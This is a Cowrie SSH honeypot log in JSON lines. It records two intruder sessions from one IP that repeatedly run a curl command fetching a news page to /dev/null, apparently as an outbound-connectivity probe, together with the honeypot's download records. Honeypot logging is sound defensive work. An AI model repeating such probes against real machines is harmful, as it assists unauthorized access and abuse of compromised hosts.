{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.152086Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.153703Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.154855Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.171953Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.189500Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.190493Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.194016Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.194717Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.207463Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.213455Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.216901Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.228310Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.229142Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.230933Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.231783Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.240517Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.293098Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.294564Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.295376Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.304984Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.312034Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.331314Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.332220Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.349401Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.367481Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.369425Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.370167Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.405580Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.406720Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.407652Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.425497Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.440705Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.443425Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.444634Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.450336Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.453628Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.455307Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.459149Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.465462Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.467266Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.469352Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.471698Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.473355Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.476636Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.479955Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.482634Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.484948Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.485949Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.488911Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.491812Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.493213Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.497392Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.499765Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.505031Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.509754Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.510619Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.515135Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.518482Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.523192Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.524082Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.529551Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.532172Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.539345Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.544013Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.547905Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
